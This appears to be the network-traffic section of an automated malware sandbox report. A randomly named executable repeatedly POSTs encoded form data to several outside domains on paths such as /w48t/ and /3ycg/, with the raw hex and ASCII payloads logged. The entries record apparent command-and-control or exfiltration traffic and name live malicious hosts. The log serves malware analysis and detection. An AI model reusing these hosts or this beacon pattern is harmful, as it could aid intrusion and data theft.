                                                                                                                              22192.168.2.649994162.213.249.216805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:15.404201984 CEST683OUTPOST /w48t/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.tophcom.online
                                                                                                                              Origin: http://www.tophcom.online
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 233
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.tophcom.online/w48t/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 75 4c 33 65 74 44 69 47 49 75 44 53 65 2b 6e 6a 37 58 78 35 36 63 32 58 6c 56 55 6c 65 7a 51 6e 58 45 69 38 78 38 77 35 4b 5a 4a 43 67 42 58 39 6b 48 70 48 56 6c 30 2b 73 50 62 2b 33 69 4f 37 4f 56 59 67 58 39 48 62 69 48 54 42 66 52 39 6b 4c 6f 65 77 32 38 4a 47 70 67 64 34 4e 4d 79 47 4e 75 2f 57 56 57 43 61 64 71 67 30 79 62 66 57 79 59 55 45 4b 59 49 51 2f 63 45 57 65 66 6c 2f 52 39 69 77 4e 71 35 52 39 6c 4f 42 50 47 4a 44 45 39 7a 64 4a 55 63 67 31 51 43 74 63 59 41 2b 73 69 5a 53 4d 6f 52 35 4e 75 38 31 71 4d 77 66 4a 42 44 64 43 32 64 4a 55 50 37 67 71 36 71 58 62 50 42 72 41 62 56 4d 79 5a 61 62 59 43 46 32 4a 6e 4f 75 7a 74 2b 30 6a 2b 75 52 6b 7a 33 62 4a 51 3d 3d
                                                                                                                              Data Ascii: kT9p=uL3etDiGIuDSe+nj7Xx56c2XlVUlezQnXEi8x8w5KZJCgBX9kHpHVl0+sPb+3iO7OVYgX9HbiHTBfR9kLoew28JGpgd4NMyGNu/WVWCadqg0ybfWyYUEKYIQ/cEWefl/R9iwNq5R9lOBPGJDE9zdJUcg1QCtcYA+siZSMoR5Nu81qMwfJBDdC2dJUP7gq6qXbPBrAbVMyZabYCF2JnOuzt+0j+uRkz3bJQ==
                                                                                                                              Oct 22, 2024 05:40:16.082892895 CEST533INHTTP/1.1 404 Not Found
                                                                                                                              Date: Tue, 22 Oct 2024 03:40:15 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              23192.168.2.649995162.213.249.216805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:17.958930016 CEST1696OUTPOST /w48t/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.tophcom.online
                                                                                                                              Origin: http://www.tophcom.online
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 1245
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.tophcom.online/w48t/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 75 4c 33 65 74 44 69 47 49 75 44 53 65 2b 6e 6a 37 58 78 35 36 63 32 58 6c 56 55 6c 65 7a 51 6e 58 45 69 38 78 38 77 35 4b 5a 52 43 6a 30 44 39 6d 6b 42 48 57 6c 30 2b 79 2f 62 2f 33 69 50 72 4f 56 78 72 58 39 37 68 69 45 6e 42 65 7a 46 6b 65 71 32 77 73 73 4a 47 6b 41 64 35 44 73 7a 53 4e 76 50 53 56 57 53 61 64 71 67 30 79 64 37 57 32 4d 34 45 61 6f 4a 69 6f 73 45 4b 61 66 6b 61 52 39 36 67 4e 71 38 75 39 55 79 42 50 6d 35 44 49 75 62 64 4c 30 63 59 79 51 43 2b 63 59 4d 68 73 68 74 67 4d 74 74 44 4e 73 67 31 36 74 56 42 52 43 36 45 54 6d 31 76 44 74 54 47 6b 39 66 6b 65 73 35 46 50 37 4a 44 7a 36 36 51 5a 6b 34 74 4c 6b 37 44 7a 4d 50 42 67 4b 57 50 77 6e 62 56 58 31 4b 48 4d 46 47 6c 2f 44 7a 6d 76 4b 68 79 52 42 73 76 7a 36 72 57 6f 58 48 32 74 34 6c 44 67 43 56 42 77 4a 58 64 35 6e 59 4f 72 33 5a 50 32 37 5a 37 2f 55 62 49 6c 52 37 6b 38 4f 74 4c 51 33 54 62 6a 75 5a 7a 4e 41 6e 7a 56 79 6d 70 56 4c 4f 67 78 6a 48 47 35 53 32 4c 6a 6a 58 48 51 4a 6d 56 2b 34 31 78 79 72 45 70 58 [TRUNCATED]
                                                                                                                              Data Ascii: kT9p=uL3etDiGIuDSe+nj7Xx56c2XlVUlezQnXEi8x8w5KZRCj0D9mkBHWl0+y/b/3iPrOVxrX97hiEnBezFkeq2wssJGkAd5DszSNvPSVWSadqg0yd7W2M4EaoJiosEKafkaR96gNq8u9UyBPm5DIubdL0cYyQC+cYMhshtgMttDNsg16tVBRC6ETm1vDtTGk9fkes5FP7JDz66QZk4tLk7DzMPBgKWPwnbVX1KHMFGl/DzmvKhyRBsvz6rWoXH2t4lDgCVBwJXd5nYOr3ZP27Z7/UbIlR7k8OtLQ3TbjuZzNAnzVympVLOgxjHG5S2LjjXHQJmV+41xyrEpXDbUXUADmod046yHaP/Yo8qFEHazAZrBA+gmhvAfGmCH9o8RXmNsx+X8mho0HSjw+d5svijw3OOp3CRTX3CVHyWXNWO3kuy/wP836Ckw8FZeB3+BXtOb65w2eJeyAkedjcbqOR4qcMYWsmT5r7s7fNAuvbWRYQTPobxqGBBq8l4qHRwuC1Al8qgm3lqGiFlu92vpekpjsrtw1Gkam/vUCelZ4l60cgMya459PIX76ldXxvfjWsFdRyKSvfLPFYhJr54GcJKcWFpg+6fU9ntdOpMvoDYY7iuH7g4OOPA6OeWIw1TDVO7fohx1O01KpvJ37oE7mPctEar79+x495fSdvWJqpr6z9WfcY3G1pM8liiUmTDFkXkSYC2Z8z2+LTQKCJhEdtz/gRV3sGPhxR5WOftNE7U6354r7pU7ImOC6T7s+dha1qIkQ7NitUX1Z8aIIhOj/HW/e/j9oIyEdDvnQUtZNqIux2o/ggdnx4zmJ7f8KTRGI/XfTHSu7lC0BJsDkhpV36imxHMgIJ1D/JlKbCK3sdZW9KJozbdZBsDOduV2VWoi/vuoLAFraKEm0tnpn1zL0ypfJXvA2n88x19PTahcmD+owr1V23gXAvC4qw1AMUYjXmCzYyMf7pW0QhkYNqWrwOFJeEFWxkizYCUpmQjSU3JTexEgEdS [TRUNCATED]
                                                                                                                              Oct 22, 2024 05:40:18.649277925 CEST533INHTTP/1.1 404 Not Found
                                                                                                                              Date: Tue, 22 Oct 2024 03:40:18 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              24192.168.2.649996162.213.249.216805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:20.504648924 CEST408OUTGET /w48t/?in1Hf=rx3dZnMxlRvDbR&kT9p=jJf+uzLSIbfTebLlnllI962yuVk8Hw4tbleG5p05VL9UtkahhFlDUVJutvL9vCK8DEN3aeTkpXm8VBxSWq3LxvJEsjtiOsjWB/GCZl2Odas12ant1owrZYZ7neQtVdJoZOGoB8U= HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.tophcom.online
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Oct 22, 2024 05:40:21.178417921 CEST548INHTTP/1.1 404 Not Found
                                                                                                                              Date: Tue, 22 Oct 2024 03:40:21 GMT
                                                                                                                              Server: Apache
                                                                                                                              Content-Length: 389
                                                                                                                              Connection: close
                                                                                                                              Content-Type: text/html; charset=utf-8
                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              25192.168.2.649997221.121.144.149805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:27.542023897 CEST674OUTPOST /3ycg/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.inf30027group23.xyz
                                                                                                                              Origin: http://www.inf30027group23.xyz
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 209
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.inf30027group23.xyz/3ycg/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 6b 42 7a 64 33 6b 6a 45 67 66 77 75 4b 39 58 7a 4b 2b 62 78 77 44 6e 54 52 79 53 62 47 54 59 30 35 4a 4c 52 42 78 54 4a 6a 53 4f 37 4f 5a 51 71 30 48 70 41 54 43 72 66 33 59 70 2f 77 37 4e 4c 35 4d 5a 59 69 36 44 56 6c 4f 4a 48 65 53 6c 2b 58 64 77 67 77 46 41 45 57 61 72 62 66 79 6a 65 59 68 2f 38 54 61 5a 56 37 63 59 63 2b 54 66 63 71 71 45 39 2f 72 7a 32 5a 75 69 67 6e 35 6f 4f 6c 59 2f 54 32 51 59 52 52 70 55 5a 72 33 41 43 77 47 4c 63 49 6b 4d 6f 42 41 4e 37 35 7a 63 74 6c 31 2f 69 36 2b 44 48 57 4b 70 51 49 2f 69 54 43 68 32 47 62 37 58 32 76 41 36 34 36 56 53 75 5a 46 63 67 6c 4b 35 69 46 7a 43 56
                                                                                                                              Data Ascii: kT9p=kBzd3kjEgfwuK9XzK+bxwDnTRySbGTY05JLRBxTJjSO7OZQq0HpATCrf3Yp/w7NL5MZYi6DVlOJHeSl+XdwgwFAEWarbfyjeYh/8TaZV7cYc+TfcqqE9/rz2Zuign5oOlY/T2QYRRpUZr3ACwGLcIkMoBAN75zctl1/i6+DHWKpQI/iTCh2Gb7X2vA646VSuZFcglK5iFzCV


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              26192.168.2.649998221.121.144.149805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:30.132349014 CEST698OUTPOST /3ycg/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.inf30027group23.xyz
                                                                                                                              Origin: http://www.inf30027group23.xyz
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 233
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.inf30027group23.xyz/3ycg/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 6b 42 7a 64 33 6b 6a 45 67 66 77 75 59 4f 50 7a 49 5a 6e 78 31 6a 6e 4d 4e 69 53 62 49 7a 59 77 35 4a 33 52 42 77 58 5a 67 6d 69 37 4f 34 67 71 33 43 4a 41 53 43 72 66 38 34 70 6d 74 72 4e 41 35 4d 64 6d 69 2f 37 56 6c 4f 64 48 65 57 70 2b 58 73 77 76 78 56 41 47 43 71 72 5a 62 79 6a 65 59 68 2f 38 54 61 4e 72 37 63 51 63 2f 6a 50 63 72 49 38 38 38 72 7a 78 4f 65 69 67 78 35 6f 53 6c 59 2f 74 32 53 38 33 52 71 73 5a 72 79 38 43 77 53 66 66 62 45 4d 69 63 51 4d 32 34 52 64 2f 72 6b 61 70 79 76 48 59 4a 5a 56 78 45 70 6a 4a 65 53 32 6c 4a 72 33 30 76 43 69 4b 36 31 53 45 62 46 6b 67 33 64 31 46 4b 48 6e 32 45 43 72 32 74 74 35 5a 41 66 44 4b 54 68 46 38 38 63 48 30 59 41 3d 3d
                                                                                                                              Data Ascii: kT9p=kBzd3kjEgfwuYOPzIZnx1jnMNiSbIzYw5J3RBwXZgmi7O4gq3CJASCrf84pmtrNA5Mdmi/7VlOdHeWp+XswvxVAGCqrZbyjeYh/8TaNr7cQc/jPcrI888rzxOeigx5oSlY/t2S83RqsZry8CwSffbEMicQM24Rd/rkapyvHYJZVxEpjJeS2lJr30vCiK61SEbFkg3d1FKHn2ECr2tt5ZAfDKThF88cH0YA==


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              27192.168.2.649999221.121.144.149805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:32.685199022 CEST1711OUTPOST /3ycg/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.inf30027group23.xyz
                                                                                                                              Origin: http://www.inf30027group23.xyz
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 1245
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.inf30027group23.xyz/3ycg/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 6b 42 7a 64 33 6b 6a 45 67 66 77 75 59 4f 50 7a 49 5a 6e 78 31 6a 6e 4d 4e 69 53 62 49 7a 59 77 35 4a 33 52 42 77 58 5a 67 6e 32 37 4e 4b 6f 71 6c 6a 4a 41 56 43 72 66 31 59 70 6a 74 72 4e 6e 35 4d 6c 36 69 2f 2f 76 6c 49 5a 48 63 7a 31 2b 56 59 63 76 2f 6c 41 47 64 36 72 61 66 79 69 61 59 68 76 34 54 61 64 72 37 63 51 63 2f 6c 4c 63 73 61 45 38 78 4c 7a 32 5a 75 69 61 6e 35 6f 32 6c 59 6e 39 32 53 6f 42 52 37 4d 5a 6c 79 4d 43 6a 33 4c 66 42 45 4d 6b 66 51 4e 6c 34 52 51 68 72 6b 57 55 79 76 7a 69 4a 61 4a 78 42 76 65 6b 61 6a 7a 39 61 4a 37 35 75 44 71 4c 68 31 53 7a 52 46 77 46 32 75 46 34 4a 6e 66 39 46 6c 33 49 6c 73 38 55 48 63 48 2f 51 6e 30 67 30 73 4b 54 4e 71 47 78 35 51 52 66 79 61 44 73 5a 71 58 38 6d 31 74 56 77 5a 6c 31 50 4c 42 34 55 55 65 33 48 65 62 6a 42 67 73 44 68 41 43 78 4c 48 54 33 77 76 43 74 71 61 4a 70 62 69 4f 6f 37 79 64 72 49 49 78 56 7a 57 63 65 54 54 41 33 56 45 4a 76 56 38 5a 71 4d 74 4a 38 34 72 74 4b 65 65 33 44 6d 51 52 69 77 56 57 37 74 4f 6c 34 44 [TRUNCATED]
                                                                                                                              Data Ascii: kT9p=kBzd3kjEgfwuYOPzIZnx1jnMNiSbIzYw5J3RBwXZgn27NKoqljJAVCrf1YpjtrNn5Ml6i//vlIZHcz1+VYcv/lAGd6rafyiaYhv4Tadr7cQc/lLcsaE8xLz2Zuian5o2lYn92SoBR7MZlyMCj3LfBEMkfQNl4RQhrkWUyvziJaJxBvekajz9aJ75uDqLh1SzRFwF2uF4Jnf9Fl3Ils8UHcH/Qn0g0sKTNqGx5QRfyaDsZqX8m1tVwZl1PLB4UUe3HebjBgsDhACxLHT3wvCtqaJpbiOo7ydrIIxVzWceTTA3VEJvV8ZqMtJ84rtKee3DmQRiwVW7tOl4DXWH+3rvTrB5qVtpw2L53tdf4ojKOk8bPLSqGst/S67zZr95vtDqWKT9rylGfwvhanBiG1NMH4WjAEvHieQpOdUTxBk3iwGa50vH7ng0SwHk3lDAONYDfZnPvstlw8pp8swvH/cWurY1XDMDhglT11sZUuaFw+yCk8Y4YQUQVtyfM/MLP8Mvs0ZvCgDVVPbUW+2Ek+2kGb3M3fKu9XmHc4HQgc4T55Joh32DAyf5ER+ZJlMeMx5ebSZREyDeZ0dkLLNw4Wq76TStaVWCtS8HZ6zR2ssO62jKUZ/EmXKplWNxYp2Es+qZlxEXDtDaQqSv3GKjmpd2buWN1dKOxFThYN/MFhCv0fmA0U5lXIYAE0pIO+Wz1MttzznKuxDutW5z8pRuO6P2MMgtEyP7e7DkF+mprvlyY6xeiU3foQWqm7C/8x0O6fKAPrNRamszyNPno19pYwabTo/Bjxf2tWQae3DYLQbyytGRwXeenJ537dyNLKBO5WnzlAz2Q4ZHJLC3/vXsXC9V46CfaGkTKQDitx+zitAn1onMkH9mYXkgqJn6q6LRuZ84Y1YYxOzCTWdeoroPFquaOI32SmQAWdMxv2t2hvcQdL5+klYzMss80sN2CO5IXTaQTxtBHynlFx+DtZryEU7soVx9sUULrV5PHKcPp7l2Zxg3zBH [TRUNCATED]


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              28192.168.2.650000221.121.144.149805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:35.228218079 CEST413OUTGET /3ycg/?kT9p=pDb90QysyaZySbP/Lb/85VXpHjKeZwoE0p/ODTrpnAu3DfEgpB0uRxX+6J53waNs/qZsvobulOY9cjRmYN5o5DJXVIa4VTjeIROacIJgysQWwkDrvblS6LDkWdy22I4DlZH18HE=&in1Hf=rx3dZnMxlRvDbR HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.inf30027group23.xyz
                                                                                                                              Connection: close
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Oct 22, 2024 05:40:36.621258974 CEST640INHTTP/1.1 301 Moved Permanently
                                                                                                                              Connection: close
                                                                                                                              expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                              cache-control: no-cache, must-revalidate, max-age=0
                                                                                                                              content-type: text/html; charset=UTF-8
                                                                                                                              x-redirect-by: WordPress
                                                                                                                              location: http://inf30027group23.xyz/3ycg/?kT9p=pDb90QysyaZySbP/Lb/85VXpHjKeZwoE0p/ODTrpnAu3DfEgpB0uRxX+6J53waNs/qZsvobulOY9cjRmYN5o5DJXVIa4VTjeIROacIJgysQWwkDrvblS6LDkWdy22I4DlZH18HE=&in1Hf=rx3dZnMxlRvDbR
                                                                                                                              x-litespeed-cache-control: public,max-age=3600
                                                                                                                              x-litespeed-tag: 3da_HTTP.404,3da_HTTP.301,3da_404,3da_URL.aa729817747d5c0f1a8ac4aa10bef22d,3da_
                                                                                                                              content-length: 0
                                                                                                                              date: Tue, 22 Oct 2024 03:40:37 GMT
                                                                                                                              server: LiteSpeed


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              29192.168.2.650001199.59.243.227805776C:\Program Files (x86)\hyllEXfRqReeCShsrFCovzxGskZRzslojccsGTOlRBCEtLXo\EqOUZfSIzU.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              Oct 22, 2024 05:40:41.909851074 CEST680OUTPOST /g3wl/ HTTP/1.1
                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              Host: www.donante-de-ovulos.biz
                                                                                                                              Origin: http://www.donante-de-ovulos.biz
                                                                                                                              Connection: close
                                                                                                                              Cache-Control: no-cache
                                                                                                                              Content-Length: 209
                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                              Referer: http://www.donante-de-ovulos.biz/g3wl/
                                                                                                                              User-Agent: Opera/9.80 (Windows NT 5.1) Presto/2.12.388 Version/12.14
                                                                                                                              Data Raw: 6b 54 39 70 3d 34 41 67 57 6f 53 67 69 4f 4e 74 36 50 4a 38 58 78 6b 61 69 34 74 52 34 71 75 2f 47 74 54 36 61 63 4e 38 6f 76 66 6c 31 58 61 46 76 78 69 34 63 4f 37 67 65 4f 53 4e 6d 6f 4f 2b 6d 39 39 33 6d 79 59 2b 56 41 77 61 47 73 66 4f 39 41 77 72 4f 30 41 59 2f 76 78 49 32 78 4b 68 6b 65 73 74 50 34 42 41 61 6e 77 76 47 58 4f 73 37 76 2f 61 47 43 4b 68 38 71 76 43 66 71 5a 69 43 35 34 43 46 55 46 6e 6c 46 4e 59 4c 55 4f 61 50 55 69 43 6f 54 76 66 4d 75 64 36 6d 35 7a 5a 6c 45 6b 72 32 49 78 64 48 57 37 70 61 43 49 70 41 46 53 71 4f 41 74 61 53 31 33 63 41 43 52 4d 51 39 41 34 45 5a 6c 70 41 73 36 52 36 6c 43 5a 73
                                                                                                                              Data Ascii: kT9p=4AgWoSgiONt6PJ8Xxkai4tR4qu/GtT6acN8ovfl1XaFvxi4cO7geOSNmoO+m993myY+VAwaGsfO9AwrO0AY/vxI2xKhkestP4BAanwvGXOs7v/aGCKh8qvCfqZiC54CFUFnlFNYLUOaPUiCoTvfMud6m5zZlEkr2IxdHW7paCIpAFSqOAtaS13cACRMQ9A4EZlpAs6R6lCZs
                                                                                                                              Oct 22, 2024 05:40:42.522188902 CEST1236INHTTP/1.1 200 OK
                                                                                                                              date: Tue, 22 Oct 2024 03:40:41 GMT
                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                              content-length: 1154
                                                                                                                              x-request-id: d9fb7421-c61d-4614-bbd2-7703015ef4a6
                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                              vary: sec-ch-prefers-color-scheme
